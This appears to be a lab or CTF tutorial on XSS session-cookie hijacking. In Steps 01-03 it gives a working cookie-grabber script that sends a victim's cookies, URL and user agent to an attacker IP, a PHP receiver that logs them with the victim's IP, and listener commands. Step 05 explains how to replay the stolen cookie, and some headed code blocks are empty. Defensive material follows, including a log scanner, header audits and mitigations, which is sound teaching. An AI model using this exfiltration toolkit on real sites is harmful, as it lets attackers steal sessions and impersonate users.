
Session Cookie Hijacking

XSS session hijacking is an attack that uses a Cross-Site Scripting vulnerability to steal a victim's session cookie. Once the attacker captures the cookie, they can impersonate the victim by replaying it in authenticated requests — effectively taking over their session without needing credentials.

AUTHORIZED TESTING ONLY. Performing cookie hijacking against systems you do not own or have explicit written permission to test is illegal under computer fraud laws. This documentation is for educational and CTF use only.
OVERVIEW
How It Works
The attack flows in three phases: inject a remote script via XSS → the victim's browser executes the script and sends their cookie to your server → your PHP listener captures and logs the cookie. You then replay the cookie in your browser to hijack the session.
Attack flow:
1. Attacker injects XSS
2. Victim visits page
3. Browser loads script.js
4. script.js sends cookie via GET
5. index.php logs cookie
6. Attacker reads cookies.txt
7. Attacker replays cookie
8. SESSION HIJACKED

Lab parameters used throughout:
ATTACKER IP: 10.200.1.255 (replace with yours)
LISTENER PORT: 80 (HTTP)
SERVER SOFTWARE: PHP 7.4+ built-in server
LOG FILE: cookies.txt
STEP 01
Setup script.js — The Cookie Grabber
This JavaScript file runs on the victim's browser when they trigger the XSS. It creates a new Image object with a specially crafted src URL that appends document.cookie as a query parameter. The victim's browser makes a GET request to your server, and the cookie travels in the URL.
JAVASCRIPT script.js
new Image().src = 'http://10.200.1.255/index.php?c=' + document.cookie
How it works: The Image object's src is set to your server URL with document.cookie appended. The browser immediately attempts to load the image — which triggers an HTTP GET to your server with the cookie in the query string. The server never needs to actually serve an image; it just needs to log the request.
Enhanced version — encodes cookie and includes referrer for context:
JAVASCRIPT script.js (enhanced)
var img = new Image();
img.src = 'http://10.200.1.255/index.php?c='
  + encodeURIComponent(document.cookie)
  + '&url=' + encodeURIComponent(document.location.href)
  + '&ua=' + encodeURIComponent(navigator.userAgent);
STEP 02
Setup index.php — The Cookie Receiver
This PHP script runs on your server. It listens for GET requests containing the cookie parameter, parses the cookie string, and writes each cookie along with the victim's IP address to a log file called cookies.txt.
PHP index.php
<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file   = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>
Code breakdown: The script checks if the 'c' GET parameter exists, explodes the cookie string on semicolons (cookies are semicolon-delimited), URL-decodes each value (since document.cookie may be URL-encoded), then appends each cookie with the victim's IP to cookies.txt using append mode "a+".
Enhanced version — adds timestamp, URL, and User-Agent logging:
PHP index.php (enhanced)
<?php
if (isset($_GET['c'])) {
    $ip        = $_SERVER['REMOTE_ADDR'];
    $time      = date('Y-m-d H:i:s');
    $url       = isset($_GET['url']) ? urldecode($_GET['url']) : 'unknown';
    $ua        = isset($_GET['ua'])  ? urldecode($_GET['ua'])  : 'unknown';
    $list      = explode(";", urldecode($_GET['c']));

    $file = fopen("cookies.txt", "a+");
    fputs($file, "[{$time}] IP: {$ip} | URL: {$url}\n");
    fputs($file, "UA: {$ua}\n");
    foreach ($list as $cookie) {
        fputs($file, "  Cookie: {$cookie}\n");
    }
    fputs($file, "---\n");
    fclose($file);
}
?>
STEP 03
Start the PHP Listener
Run PHP's built-in development server on port 80. Place both script.js and index.php in the same directory before starting the server. The server will serve script.js to the victim and receive cookie data at index.php.
SHELL terminal
$ mkdir /tmp/tmpserver && cd /tmp/tmpserver
# Place script.js and index.php here
$ sudo php -S 0.0.0.0:80
PHP 7.4.15 Development Server (http://0.0.0.0:80) started
Monitor live requests — tail the cookies file in a second terminal:
SHELL terminal (second window)
$ tail -f /tmp/tmpserver/cookies.txt
Victim IP: 192.168.1.50 | Cookie: PHPSESSID=abc123def456; user_token=xyz789
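Seen from the defended network, that same GET leaves a trace: an outbound request to an unknown host whose query string carries cookie-shaped name=value pairs. The following is an added example, not part of this module, that scans constructed proxy-log lines for that pattern in Node.js; SESSION_NAMES, INTERNAL_HOSTS and the log-line format are assumptions.

```javascript
// Added example (not part of the original module): flag outbound GETs whose query
// string carries cookie-shaped name=value pairs, the trace that
// `new Image().src = '.../index.php?c=' + document.cookie` leaves in a proxy log.

// Session cookie names worth alerting on (assumption; extend for your stack).
const SESSION_NAMES = new Set(['PHPSESSID', 'JSESSIONID', 'ASP.NET_SessionId', 'session']);
// Hosts the organisation owns (constructed); any other destination is external.
const INTERNAL_HOSTS = new Set(['app.example.test', 'cdn.example.test']);

// Return the session-cookie names found in any query-parameter value of rawUrl.
function cookieNamesInQuery(rawUrl) {
  let u;
  try { u = new URL(rawUrl); } catch { return []; }
  const found = [];
  for (let value of u.searchParams.values()) {
    // A leaked document.cookie looks like "a=b; c=d"; it may be encoded twice.
    try { value = decodeURIComponent(value); } catch { /* keep as-is */ }
    for (const part of value.split(';')) {
      const name = part.trim().split('=')[0];
      if (SESSION_NAMES.has(name)) found.push(name);
    }
  }
  return found;
}

// Parse one constructed proxy-log line, "<timestamp> <client-ip> GET <url> <status>",
// and return a finding object, or null when the line is benign or unparsable.
function scanLogLine(line) {
  const m = /^(\S+) (\S+) GET (\S+) (\d{3})$/.exec(line);
  if (!m) return null;
  const [, ts, client, rawUrl, status] = m;
  const names = cookieNamesInQuery(rawUrl);
  if (names.length === 0) return null;
  const host = new URL(rawUrl).hostname;      // safe: cookieNamesInQuery parsed it
  if (INTERNAL_HOSTS.has(host)) return null;  // first-party traffic is expected
  return { ts, client, host, names, status };
}

// Scan a whole log text and return every finding.
function scanLog(text) {
  return text.split('\n').map(scanLogLine).filter(Boolean);
}

// Constructed sample log: two first-party requests and one hit shaped like the
// request that script.js from STEP 01 produces.
const SAMPLE_LOG = [
  '2024-05-01T10:00:01Z 192.168.1.50 GET https://app.example.test/profile?id=7 200',
  '2024-05-01T10:00:02Z 192.168.1.50 GET http://10.200.1.255/index.php?c=PHPSESSID%3Dabc123def456%3B%20user_token%3Dxyz789 200',
  '2024-05-01T10:00:03Z 192.168.1.51 GET https://cdn.example.test/img/logo.png 200',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) console.log(scanLog(SAMPLE_LOG));
```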
STEP 04
Inject the XSS Payload
Inject one of the following payloads into the target's input field, comment box, URL parameter, or any reflected/stored XSS vector. Each payload loads script.js from your server, which the victim's browser will execute.
STEP 05
Use the Stolen Cookie
Once you receive the session cookie in cookies.txt, you can use it to impersonate the victim. Set the cookie in your browser's developer tools or use a tool like curl or Burp Suite to replay authenticated requests.
SHELL curl with stolen cookie
JAVASCRIPT (DevTools Console) Set cookie in browser
Browser extension method: Install EditThisCookie or Cookie-Editor, navigate to the target domain, and manually paste the stolen session cookie. Refresh the page — you should now be authenticated as the victim.
DEFENSE
Mitigations & Protections
HttpOnly FLAG
Set-Cookie: session=...; HttpOnly — prevents document.cookie from reading the cookie in JS.
CSP HEADER
Content-Security-Policy: script-src 'self' — blocks loading scripts from attacker domains.
SAMESITE FLAG
Set-Cookie: session=...; SameSite=Strict — limits cross-site cookie sending.
INPUT SANITIZATION
Escape & validate all user input. Never reflect raw user data into HTML without encoding.
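An added example, not from this module, that checks whether a response actually carries the protections listed above: a Node.js audit of a Set-Cookie header and of a Content-Security-Policy script-src directive, with the weak setting beside the corrected one. Cookie values and policy strings are constructed samples.

```javascript
// Added example (not part of the original module): audit the two response headers
// the Mitigations list relies on. All cookie values and policies are constructed.

// Parse one Set-Cookie header into { name, attrs }; attribute names are lowercased,
// flag attributes (HttpOnly, Secure) become `true`.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(';').map((s) => s.trim());
  const name = pair.split('=')[0];
  const attrs = {};
  for (const a of rest) {
    const [k, v] = a.split('=');
    attrs[k.toLowerCase()] = v === undefined ? true : v;
  }
  return { name, attrs };
}

// Return the list of problems for a session cookie; an empty list means hardened.
function auditSessionCookie(header) {
  const { name, attrs } = parseSetCookie(header);
  const problems = [];
  if (!attrs.httponly) problems.push(`${name}: missing HttpOnly (readable via document.cookie)`);
  if (!attrs.secure) problems.push(`${name}: missing Secure (sent over plain HTTP)`);
  const ss = String(attrs.samesite || '').toLowerCase();
  if (ss !== 'strict' && ss !== 'lax') problems.push(`${name}: SameSite should be Strict or Lax`);
  return problems;
}

// Return problems with the script-src (or fallback default-src) of a CSP value:
// wildcards, bare schemes and 'unsafe-inline' all let a remote script.js load.
function auditCsp(policy) {
  const directives = Object.fromEntries(
    policy.split(';').map((d) => d.trim()).filter(Boolean)
      .map((d) => { const [k, ...v] = d.split(/\s+/); return [k.toLowerCase(), v]; }));
  const src = directives['script-src'] || directives['default-src'];
  if (!src) return ['no script-src or default-src: any origin may supply scripts'];
  const problems = [];
  for (const s of src) {
    if (s === '*' || s === "'unsafe-inline'" || s === 'data:' || /^https?:$/.test(s)) {
      problems.push(`script-src allows ${s}`);
    }
  }
  return problems;
}

// Constructed samples: the weak setting beside the corrected one.
const WEAK_COOKIE = 'PHPSESSID=abc123def456; Path=/';
const HARDENED_COOKIE = 'PHPSESSID=abc123def456; Path=/; HttpOnly; Secure; SameSite=Strict';
const WEAK_CSP = "default-src *; script-src * 'unsafe-inline'";
const HARDENED_CSP = "default-src 'self'; script-src 'self'";
```

Run auditSessionCookie and auditCsp against the headers your application emits; any non-empty result is a finding to fix before the cookie-grabber in STEP 01 has anything to read.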